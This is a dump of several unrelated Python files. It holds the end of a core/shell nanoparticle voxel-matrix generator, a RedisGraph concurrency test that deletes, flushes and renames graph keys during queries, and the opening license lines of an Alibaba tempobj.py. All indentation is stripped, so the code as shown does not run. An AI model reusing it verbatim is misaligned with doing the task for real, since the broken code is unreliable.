if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx36/(div))**2+(yy36/(div))**2+(zz36/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx37/(div))**2+(yy37/(div))**2+(zz37/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx38/(div))**2+(yy38/(div))**2+(zz38/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx39/(div))**2+(yy39/(div))**2+(zz39/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx40/(div))**2+(yy40/(div))**2+(zz40/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx41/(div))**2+(yy41/(div))**2+(zz41/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx42/(div))**2+(yy42/(div))**2+(zz42/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx43/(div))**2+(yy43/(div))**2+(zz43/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx44/(div))**2+(yy44/(div))**2+(zz44/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx45/(div))**2+(yy45/(div))**2+(zz45/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx46/(div))**2+(yy46/(div))**2+(zz46/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx47/(div))**2+(yy47/(div))**2+(zz47/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
return A
##################################################################################################################################
### function that describes the compaction
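# The matrix A is written to 'emp.mtx' as a run-length encoding: the first line holds the grid
# dimensions (Dx1 Dy1 Dz1); each following line is "count value", meaning that `count`
# consecutive cells (innermost index x running fastest) share the material index `value`.
# Runs are additionally flushed every 50000 cells so individual counts stay bounded.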
def compac(A,Dx1,Dy1,Dz1,zini,zfin,yini,yfin,xini,xfin):
# print (A)
print(A[21][14],"aqui agora")
fileemp=open('/home/vagner/Desktop/GREAT_REFS/MEISMATHEMATICA/shay/matrizpython/marmittexamples/ajudamarmitt/parallelmtxgen/emp.mtx','w')
fileemp.write(str(Dx1)+ ' ')
fileemp.write(str(Dy1)+ ' ')
fileemp.write(str(Dz1)+ '\n')
print(A[1][1],A[2][1],A[3][1],A[4][1],A[5][1],A[6][1],A[7][1],A[21][14],'first matrix element')
iCp_old = A[0][0]
c = 0
for k in range(zini,zfin+1):
for j in range(yini,yfin+1):
for i in range(xini,xfin+1):
iCp = A[i][j+(k-1)*Dy1]
if iCp == iCp_old:
c += 1
# print(A[21][14],"aqui agora porra")
if c == 50000:
print(c, iCp_old, file=fileemp)
c = 1
iCp_old = A[i][j+(k-1)*Dy1]
else:
print(c, iCp_old, file=fileemp)
iCp_old = iCp
c = 1
# print("veio ate aqui!!!!")
if (i==Dx1 and j==Dy1 and k==Dz1):
print(c,iCp_old, file=fileemp)
###########################################################################################################################
# Describes the dimensions of the matrix to be created, together with its parameters
# (parameters to be supplied by the user)
#if ( Npix > Npiy):
# Nmaior=Npix
# Nmenor=Npiy
#elif(Npix <= Npiy):
# Nmaior=Npiy
# Nmenor=Npix
# print(1)
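# mtxgen: top-level generator. It sizes the grid from the particle radius and the chosen
# geometry ('escolha'), zeroes the matrix, dispatches to the geometry-specific filler
# (triangular, rectangular, column, hex1..hex9, pygeneral, ...) and returns the filled matrix A
# together with the grid dimensions and loop bounds consumed later by compac().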
def mtxgen(Npix, Npiy,Ntam,dl,cs,radiusc,radiuscore,radiusshell,corenumber,shellnumber,cnum,escolha,shape,base,width,height,base2,width2,radiusx1,radiusy1,radiusz1,radiusx2,radiusy2,radiusz2,radiusxcs,radiusycs,radiuszcs,rcarbonpt,radiuspt,rcarbonpd,radiuspd,distcentro,alloynumber):
# Npix=3
# Npiy=3
# Ntam=3
# dl=5.0
#alloytudo= (input('PtPd alloy throughout? ("s" OR "n") '))
#cascaptpd= (input('PtPd shell? ("s" OR "n") '))
#core= (input('PT-core OR PD-core("pt" OR "pd") '))
#cs=10.0
#if(alloytudo =='s'):
# [radiusptpd,radiusc,radiuscore,radiusshell,corenumber,shellnumber,cnum]= estruturas(alloytudo,cascaptpd,core,cs,dl)
#if(alloytudo == 'n' and cascaptpd =='n' and (core =='pd' or core == 'pt')):
# [radiusc,radiuscore,radiusshell,corenumber,shellnumber,cnum] = estruturas(alloytudo,cascaptpd,core,cs,dl)
#[radiusc,radiuscore,radiusshell,corenumber,shellnumber,cnum]
if(escolha=='hexmono' or escolha== 'hexpy'):
Npix=Npix*2
Npiy=Npiy*2-1
print('yes')
# if(escolha != 'triplate'):
if(escolha != 'interpene'):
print(Npix,Npiy)
dx=Npix*2*radiusc
dy=Npix*2*radiusc
dz=Ntam*2*radiusc
Dx1=int(dx/dl)
Dy1=int(dy/dl)
Dz1=int(dz/dl)
elif(escolha=='interpene'):
dx=radiuspt+radiuspd+(rcarbonpt-radiuspt)+(rcarbonpd-radiuspd)+10+distcentro
if (radiuspt>=radiuspd):
dy=2*(rcarbonpt)+distcentro
# dz=2*radiuspt+2*(rcarbonpt-radiuspt)
dz=dy
dx=dy
radiusc= rcarbonpt+distcentro
if (radiuspd>radiuspt):
dy=2*(rcarbonpd)+distcentro
# dz=2*radiuspd+2*(rcarbonpd-radiuspd)
dz=dy
dx=dy
radiusc= rcarbonpt+distcentro
# elif (escolha=='triplate')
### call the function that zeroes the matrix
#zeromatrix(Dy1,Dy1,Dz1,A)
#!!!
A = zeromatrix(Dx1, Dy1, Dz1)
#!!!
# print(1)
Npixn=Dx1
Npiyn=Dy1
Ntamn=Dz1
xini=1
yini=1
zini=1
xfin=int(Npixn)#+1)
yfin=int(Npiyn)#+1)
zfin=int(Ntamn)#+1)
## zero out the array that will be used
#zeroarray(Nmaior,Nmenor)
#!!!
[x, y, z, Npart] = zeroarray(Npix,Npiy,Ntam)
# geometry choice
#!!!
# escolha = 'py'
if (escolha == 'jonder1'):
A=jonderstruct1 (xini,xfin,yini,yfin,zini,zfin,Npix,Npiy,Ntam,Dx1,Dy1,Dz1,radiusc,radiuscore,radiusshell,A,corenumber,shellnumber,cnum,dl,x,y,z,shape,base,width,height,base2,width2,radiusx1,radiusy1,radiusz1,radiusx2,radiusy2,radiusz2,radiusxcs,radiusycs,radiuszcs,cs)
if (escolha == 'jonder2'):
A=jonderstruct2 (xini,xfin,yini,yfin,zini,zfin,Npix,Npiy,Ntam,Dx1,Dy1,Dz1,radiusc,radiuscore,radiusshell,A,corenumber,shellnumber,cnum,dl,x,y,z,shape,base,width,height,base2,width2,radiusx1,radiusy1,radiusz1,radiusx2,radiusy2,radiusz2,radiusxcs,radiusycs,radiuszcs,cs)
if (escolha == 'tri'):
# if(alloytudo =='s'):
# [radiusptpd,radiusc,radiuscore,radiusshell,corenumber,shellnumber,cnum]= estruturas(alloytudo,cascaptpd,core,cs,dl)
A=triangular (xini,xfin,yini,yfin,zini,zfin,Npix,Npiy,Ntam,Dx1,Dy1,Dz1,radiusc,radiuscore,radiusshell,A,corenumber,shellnumber,cnum,dl,x,y,z,shape,base,width,height,base2,width2,radiusx1,radiusy1,radiusz1,radiusx2,radiusy2,radiusz2,radiusxcs,radiusycs,radiuszcs)
if (escolha == 'rectangular'):
# if __name__ == '__main__':
# pool = Pool(processes=4) # process per core
# pool.map(rectangular,) # proces data_inp
# return print(1)
# processes=[]
# p = Process(target=rectangular, args=(xini,xfin,yini,yfin,zini,zfin,Npix,Npiy,Ntam,Dx1,Dy1,Dz1,radiusc,radiuscore,radiusshell,A,corenumber,shellnumber,cnum,dl,x,y,z,shape,base,width,height,base2,width2,radiusx1,radiusy1,radiusz1,radiusx2,radiusy2,radiusz2,radiusxcs,radiusycs,radiuszcs,cs))
# p.start()
# processes.append(p)
# print('here')
# for p in processes:
# p.join()
A= rectangular(xini,xfin,yini,yfin,zini,zfin,Npix,Npiy,Ntam,Dx1,Dy1,Dz1,radiusc,radiuscore,radiusshell,A,corenumber,shellnumber,cnum,dl,x,y,z,shape,base,width,height,base2,width2,radiusx1,radiusy1,radiusz1,radiusx2,radiusy2,radiusz2,radiusxcs,radiusycs,radiuszcs,cs)
if (escolha == 'column'):
A=columnpiling (xini,xfin,yini,yfin,zini,zfin,Npix,Npiy,Ntam,Dx1,Dy1,Dz1,radiusc,radiuscore,radiusshell,A,corenumber,shellnumber,cnum,dl,x,y,z,shape,base,width,height,base2,width2,radiusx1,radiusy1,radiusz1,radiusx2,radiusy2,radiusz2,radiusxcs,radiusycs,radiuszcs,cs)
if (escolha == 'pygen'):
# if(alloytudo =='s'):
# [radiusptpd,radiusc,radiuscore,radiusshell,corenumber,shellnumber,cnum]= estruturas(alloytudo,cascaptpd,core,cs,dl)
# processes=[]
# p = Process(target=pygeneral, args=((xini,xfin,yini,yfin,zini,zfin,Npix,Npiy,Ntam,Dx1,Dy1,Dz1,radiusc,radiuscore,radiusshell,A,corenumber,shellnumber,cnum,dl,x,y,z,shape,base,width,height,base2,width2,radiusx1,radiusy1,radiusz1,radiusx2,radiusy2,radiusz2,radiusxcs,radiusycs,radiuszcs,cs,rcarbonpt,radiuspt,rcarbonpd,radiuspd,distcentro,alloynumber)))
# p.start()
# processes.append(p)
# print('here')
# join loop disabled: `processes` is only built by the commented-out multiprocessing code above
# for p in processes:
#     p.join()
A=pygeneral (xini,xfin,yini,yfin,zini,zfin,Npix,Npiy,Ntam,Dx1,Dy1,Dz1,radiusc,radiuscore,radiusshell,A,corenumber,shellnumber,cnum,dl,x,y,z,shape,base,width,height,base2,width2,radiusx1,radiusy1,radiusz1,radiusx2,radiusy2,radiusz2,radiusxcs,radiusycs,radiuszcs,cs,rcarbonpt,radiuspt,rcarbonpd,radiuspd,distcentro,alloynumber)
# !!!
if (escolha == 'hexmono'):
# if(alloytudo =='s'):
# [radiusptpd,radiusc,radiuscore,radiusshell,corenumber,shellnumber,cnum]= estruturas(alloytudo,cascaptpd,core,cs,dl)
A=hexmono (xini,xfin,yini,yfin,zini,zfin,Npix,Npiy,Ntam,Dx1,Dy1,Dz1,radiusc,radiuscore,radiusshell,A,corenumber,shellnumber,cnum,dl,x,y,z,shape,base,width,height,base2,width2,radiusx1,radiusy1,radiusz1,radiusx2,radiusy2,radiusz2,radiusxcs,radiusycs,radiuszcs)
# !!!
if (escolha == 'hexpy'):
A=hexpyramid (xini,xfin,yini,yfin,zini,zfin,Npix,Npiy,Ntam,Dx1,Dy1,Dz1,radiusc,radiuscore,radiusshell,A,corenumber,shellnumber,cnum,dl,x,y,z,shape,base,width,height,base2,width2,radiusx1,radiusy1,radiusz1,radiusx2,radiusy2,radiusz2,radiusxcs,radiusycs,radiuszcs)
if (escolha == 'hex1'):
A=hex1 (xini,xfin,yini,yfin,zini,zfin,Npix,Npiy,Ntam,Dx1,Dy1,Dz1,radiusc,radiuscore,radiusshell,A,corenumber,shellnumber,cnum,dl,x,y,z,shape,base,width,height,base2,width2,radiusx1,radiusy1,radiusz1,radiusx2,radiusy2,radiusz2,radiusxcs,radiusycs,radiuszcs)
if (escolha == 'hex2'):
A=hex2 (xini,xfin,yini,yfin,zini,zfin,Npix,Npiy,Ntam,Dx1,Dy1,Dz1,radiusc,radiuscore,radiusshell,A,corenumber,shellnumber,cnum,dl,x,y,z,shape,base,width,height,base2,width2,radiusx1,radiusy1,radiusz1,radiusx2,radiusy2,radiusz2,radiusxcs,radiusycs,radiuszcs)
if (escolha == 'hex3'):
A=hex3 (xini,xfin,yini,yfin,zini,zfin,Npix,Npiy,Ntam,Dx1,Dy1,Dz1,radiusc,radiuscore,radiusshell,A,corenumber,shellnumber,cnum,dl,x,y,z,shape,base,width,height,base2,width2,radiusx1,radiusy1,radiusz1,radiusx2,radiusy2,radiusz2,radiusxcs,radiusycs,radiuszcs)
if (escolha == 'hex4'):
A=hex4 (xini,xfin,yini,yfin,zini,zfin,Npix,Npiy,Ntam,Dx1,Dy1,Dz1,radiusc,radiuscore,radiusshell,A,corenumber,shellnumber,cnum,dl,x,y,z,shape,base,width,height,base2,width2,radiusx1,radiusy1,radiusz1,radiusx2,radiusy2,radiusz2,radiusxcs,radiusycs,radiuszcs)
if (escolha == 'hex5'):
A=hex5 (xini,xfin,yini,yfin,zini,zfin,Npix,Npiy,Ntam,Dx1,Dy1,Dz1,radiusc,radiuscore,radiusshell,A,corenumber,shellnumber,cnum,dl,x,y,z,shape,base,width,height,base2,width2,radiusx1,radiusy1,radiusz1,radiusx2,radiusy2,radiusz2,radiusxcs,radiusycs,radiuszcs)
if (escolha == 'hex6'):
A=hex6 (xini,xfin,yini,yfin,zini,zfin,Npix,Npiy,Ntam,Dx1,Dy1,Dz1,radiusc,radiuscore,radiusshell,A,corenumber,shellnumber,cnum,dl,x,y,z,shape,base,width,height,base2,width2,radiusx1,radiusy1,radiusz1,radiusx2,radiusy2,radiusz2,radiusxcs,radiusycs,radiuszcs)
if (escolha == 'hex7'):
A=hex7 (xini,xfin,yini,yfin,zini,zfin,Npix,Npiy,Ntam,Dx1,Dy1,Dz1,radiusc,radiuscore,radiusshell,A,corenumber,shellnumber,cnum,dl,x,y,z,shape,base,width,height,base2,width2,radiusx1,radiusy1,radiusz1,radiusx2,radiusy2,radiusz2,radiusxcs,radiusycs,radiuszcs)
if (escolha == 'hex8'):
A=hex8 (xini,xfin,yini,yfin,zini,zfin,Npix,Npiy,Ntam,Dx1,Dy1,Dz1,radiusc,radiuscore,radiusshell,A,corenumber,shellnumber,cnum,dl,x,y,z,shape,base,width,height,base2,width2,radiusx1,radiusy1,radiusz1,radiusx2,radiusy2,radiusz2,radiusxcs,radiusycs,radiuszcs)
if (escolha == 'hex9'):
A=hex9 (xini,xfin,yini,yfin,zini,zfin,Npix,Npiy,Ntam,Dx1,Dy1,Dz1,radiusc,radiuscore,radiusshell,A,corenumber,shellnumber,cnum,dl,x,y,z,shape,base,width,height,base2,width2,radiusx1,radiusy1,radiusz1,radiusx2,radiusy2,radiusz2,radiusxcs,radiusycs,radiuszcs)
if (escolha == 'trifcc2in2'):
A=triangularfcc2in2 (xini,xfin,yini,yfin,zini,zfin,Npix,Npiy,Ntam,Dx1,Dy1,Dz1,radiusc,radiuscore,radiusshell,A,corenumber,shellnumber,cnum,dl,x,y,z,shape,base,width,height,base2,width2,cs,radiusx1,radiusy1,radiusz1,radiusx2,radiusy2,radiusz2,radiusxcs,radiusycs,radiuszcs)
# pygeneral (m, ...)
# !!!
# print(A)
return A,Dx1,Dy1,Dz1,zini,zfin,yini,yfin,xini,xfin
###########################################################################################################################
###########################################################################################################################
|
test_concurrent_query.py
|
import os
import sys
import threading
from RLTest import Env
from redisgraph import Graph, Node, Edge
from redis import ResponseError
from base import FlowTestsBase
GRAPH_ID = "G" # Graph identifier.
CLIENT_COUNT = 16 # Number of concurrent connections.
graphs = None # One graph object per client.
assertions = [True] * CLIENT_COUNT # Each thread places its verdict at position threadID.
exceptions = [None] * CLIENT_COUNT # Each thread that fails stores its exception message at position threadID.
people = ["Roi", "Alon", "Ailon", "Boaz", "Tal", "Omri", "Ori"]
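# Worker functions below run concurrently, one per client thread; each records its verdict
# (or raw query result) in the shared `assertions` list at index threadID.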
def query_aggregate(graph, query, threadID):
global assertions
assertions[threadID] = True
for i in range(10):
actual_result = graph.query(query)
person_count = actual_result.result_set[0][0]
if person_count != len(people):
assertions[threadID] = False
break
def query_neighbors(graph, query, threadID):
global assertions
assertions[threadID] = True
# Fully connected graph: every person knows every other person.
expected_resultset_size = len(people) * (len(people)-1)
for i in range(10):
actual_result = graph.query(query)
if len(actual_result.result_set) != expected_resultset_size:
assertions[threadID] = False
break
def query_write(graph, query, threadID):
global assertions
assertions[threadID] = True
for i in range(10):
actual_result = graph.query(query)
if actual_result.nodes_created != 1 or actual_result.properties_set != 1:
assertions[threadID] = False
break
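# Run a single query; store its result in assertions[threadID] or, on failure, the error text
# in exceptions[threadID].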
def thread_run_query(graph, query, threadID):
global assertions
try:
assertions[threadID] = graph.query(query)
except ResponseError as e:
exceptions[threadID] = str(e)
def delete_graph(graph, threadID):
global assertions
assertions[threadID] = True
# Try to delete graph.
try:
graph.delete()
except:
# Graph deletion failed.
assertions[threadID] = False
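# Flow tests exercising RedisGraph under concurrent readers, writers and key-level operations
# (DEL, FLUSHALL, RENAME, SET) issued while queries are in flight.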
class testConcurrentQueryFlow(FlowTestsBase):
def __init__(self):
self.env = Env(decodeResponses=True)
global graphs
graphs = []
for i in range(0, CLIENT_COUNT):
redis_con = self.env.getConnection()
graphs.append(Graph(GRAPH_ID, redis_con))
self.populate_graph()
def populate_graph(self):
nodes = {}
graph = graphs[0]
# Create entities
for p in people:
node = Node(label="person", properties={"name": p})
graph.add_node(node)
nodes[p] = node
# Fully connected graph
for src in nodes:
for dest in nodes:
if src != dest:
edge = Edge(nodes[src], "know", nodes[dest])
graph.add_edge(edge)
graph.commit()
# Count number of nodes in the graph
def test01_concurrent_aggregation(self):
q = """MATCH (p:person) RETURN count(p)"""
threads = []
for i in range(CLIENT_COUNT):
graph = graphs[i]
t = threading.Thread(target=query_aggregate, args=(graph, q, i))
t.setDaemon(True)
threads.append(t)
t.start()
# Wait for threads to return.
for i in range(CLIENT_COUNT):
t = threads[i]
t.join()
self.env.assertTrue(assertions[i])
# Concurrently get neighbors of every node.
def test02_retrieve_neighbors(self):
q = """MATCH (p:person)-[know]->(n:person) RETURN n.name"""
threads = []
for i in range(CLIENT_COUNT):
graph = graphs[i]
t = threading.Thread(target=query_neighbors, args=(graph, q, i))
t.setDaemon(True)
threads.append(t)
t.start()
# Wait for threads to return.
for i in range(CLIENT_COUNT):
t = threads[i]
t.join()
self.env.assertTrue(assertions[i])
# Concurrent writes
def test_03_concurrent_write(self):
threads = []
for i in range(CLIENT_COUNT):
graph = graphs[i]
q = """CREATE (c:country {id:"%d"})""" % i
t = threading.Thread(target=query_write, args=(graph, q, i))
t.setDaemon(True)
threads.append(t)
t.start()
# Wait for threads to return.
for i in range(CLIENT_COUNT):
t = threads[i]
t.join()
self.env.assertTrue(assertions[i])
# Try to delete graph multiple times.
def test_04_concurrent_delete(self):
threads = []
for i in range(CLIENT_COUNT):
graph = graphs[i]
t = threading.Thread(target=delete_graph, args=(graph, i))
t.setDaemon(True)
threads.append(t)
t.start()
# Wait for threads to return.
for i in range(CLIENT_COUNT):
t = threads[i]
t.join()
# Exactly one thread should have successfully deleted the graph.
self.env.assertEquals(assertions.count(True), 1)
# Try to delete a graph while multiple queries are executing.
def test_05_concurrent_read_delete(self):
redis_con = self.env.getConnection()
##############################################################################################
# Delete graph via Redis DEL key.
##############################################################################################
self.populate_graph()
q = """UNWIND (range(0, 10000)) AS x WITH x AS x WHERE (x / 900) = 1 RETURN x"""
threads = []
for i in range(CLIENT_COUNT):
graph = graphs[i]
t = threading.Thread(target=thread_run_query, args=(graph, q, i))
t.setDaemon(True)
threads.append(t)
t.start()
redis_con.delete(GRAPH_ID)
# Wait for threads to return.
for i in range(CLIENT_COUNT):
t = threads[i]
t.join()
self.env.assertEquals(assertions[i].result_set[0][0], 900)
# Make sure the graph is empty, i.e. the graph was deleted.
resultset = graphs[0].query("MATCH (n) RETURN count(n)").result_set
self.env.assertEquals(resultset[0][0], 0)
##############################################################################################
# Delete graph via Redis FLUSHALL.
##############################################################################################
self.populate_graph()
q = """UNWIND (range(0, 10000)) AS x WITH x AS x WHERE (x / 900) = 1 RETURN x"""
threads = []
for i in range(CLIENT_COUNT):
graph = graphs[i]
t = threading.Thread(target=thread_run_query, args=(graph, q, i))
t.setDaemon(True)
threads.append(t)
t.start()
redis_con.flushall()
# Wait for threads to return.
for i in range(CLIENT_COUNT):
t = threads[i]
t.join()
self.env.assertEquals(assertions[i].result_set[0][0], 900)
# Make sure the graph is empty, i.e. the graph was deleted.
resultset = graphs[0].query("MATCH (n) RETURN count(n)").result_set
self.env.assertEquals(resultset[0][0], 0)
##############################################################################################
# Delete graph via GRAPH.DELETE.
##############################################################################################
self.populate_graph()
q = """UNWIND (range(0, 10000)) AS x WITH x AS x WHERE (x / 900) = 1 RETURN x"""
threads = []
for i in range(CLIENT_COUNT):
graph = graphs[i]
t = threading.Thread(target=thread_run_query, args=(graph, q, i))
t.setDaemon(True)
threads.append(t)
t.start()
graphs[i].delete()
# Wait for threads to return.
for i in range(CLIENT_COUNT):
t = threads[i]
t.join()
self.env.assertEquals(assertions[i].result_set[0][0], 900)
# Make sure the graph is empty, i.e. the graph was deleted.
resultset = graphs[0].query("MATCH (n) RETURN count(n)").result_set
self.env.assertEquals(resultset[0][0], 0)
def test_06_concurrent_write_delete(self):
# Test setup - validate that graph exists and possible results are None
graphs[0].query("MATCH (n) RETURN n")
assertions[0] = None
exceptions[0] = None
redis_con = self.env.getConnection()
heavy_write_query = """UNWIND(range(0,999999)) as x CREATE(n)"""
writer = threading.Thread(target=thread_run_query, args=(graphs[0], heavy_write_query, 0))
writer.setDaemon(True)
writer.start()
redis_con.delete(GRAPH_ID)
writer.join()
possible_exceptions = ["Encountered different graph value when opened key " + GRAPH_ID,
"Encountered an empty key when opened key " + GRAPH_ID]
if exceptions[0] is not None:
self.env.assertContains(exceptions[0], possible_exceptions)
else:
self.env.assertEquals(1000000, assertions[0].nodes_created)
def test_07_concurrent_write_rename(self):
# Test setup - validate that graph exists and possible results are None
graphs[0].query("MATCH (n) RETURN n")
assertions[0] = None
exceptions[0] = None
redis_con = self.env.getConnection()
new_graph = GRAPH_ID + "2"
# Create new empty graph with id GRAPH_ID + "2"
redis_con.execute_command("GRAPH.QUERY",new_graph, """MATCH (n) return n""", "--compact")
heavy_write_query = """UNWIND(range(0,999999)) as x CREATE(n)"""
writer = threading.Thread(target=thread_run_query, args=(graphs[0], heavy_write_query, 0))
writer.setDaemon(True)
writer.start()
redis_con.rename(new_graph, GRAPH_ID)
writer.join()
# Possible scenarios:
# 1. The rename happens before the query is sent. The graph context still holds the name new_graph, so on commit, trying to open the new_graph key encounters an empty key, since new_graph is no longer a valid key.
#    Note: as of https://github.com/RedisGraph/RedisGraph/pull/820 this may no longer apply, since the rename event handler might rename the graph key before the query executes.
# 2. The rename happens while the query is executing, so on commit the stored graph context name (GRAPH_ID) and the retrieved graph context name (new_graph) differ, because the new_graph value is now stored under the GRAPH_ID key.
possible_exceptions = ["Encountered different graph value when opened key " + GRAPH_ID,
"Encountered an empty key when opened key " + new_graph]
if exceptions[0] is not None:
self.env.assertContains(exceptions[0], possible_exceptions)
else:
self.env.assertEquals(1000000, assertions[0].nodes_created)
def test_08_concurrent_write_replace(self):
# Test setup - validate that graph exists and possible results are None
graphs[0].query("MATCH (n) RETURN n")
assertions[0] = None
exceptions[0] = None
redis_con = self.env.getConnection()
heavy_write_query = """UNWIND(range(0,999999)) as x CREATE(n)"""
writer = threading.Thread(target=thread_run_query, args=(graphs[0], heavy_write_query, 0))
writer.setDaemon(True)
writer.start()
set_result = redis_con.set(GRAPH_ID, "1")
writer.join()
possible_exceptions = ["Encountered a non-graph value type when opened key " + GRAPH_ID,
"WRONGTYPE Operation against a key holding the wrong kind of value"]
if exceptions[0] is not None:
# If the SET command attempted to execute while the CREATE query was running,
# an exception should have been issued.
self.env.assertContains(exceptions[0], possible_exceptions)
else:
# Otherwise, both the CREATE query and the SET command should have succeeded.
self.env.assertEquals(1000000, assertions[0].nodes_created)
self.env.assertEquals(set_result, True)
def test_09_concurrent_multiple_readers_after_big_write(self):
# Test issue #890
global assertions
global exceptions
redis_con = self.env.getConnection()
redis_graph = Graph("G890", redis_con)
redis_graph.query("""UNWIND(range(0,999)) as x CREATE()-[:R]->()""")
read_query = """MATCH (n)-[r:R]->(m) RETURN n, r, m"""
assertions = [True] * CLIENT_COUNT
exceptions = [None] * CLIENT_COUNT
threads = []
for i in range(CLIENT_COUNT):
t = threading.Thread(target=thread_run_query, args=(redis_graph, read_query, i))
t.setDaemon(True)
threads.append(t)
t.start()
for i in range(CLIENT_COUNT):
t = threads[i]
t.join()
for i in range(CLIENT_COUNT):
self.env.assertIsNone(exceptions[i])
self.env.assertEquals(1000, len(assertions[i].result_set))
|
tempobj.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright 1999-2017 Alibaba Group Holding Ltd.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
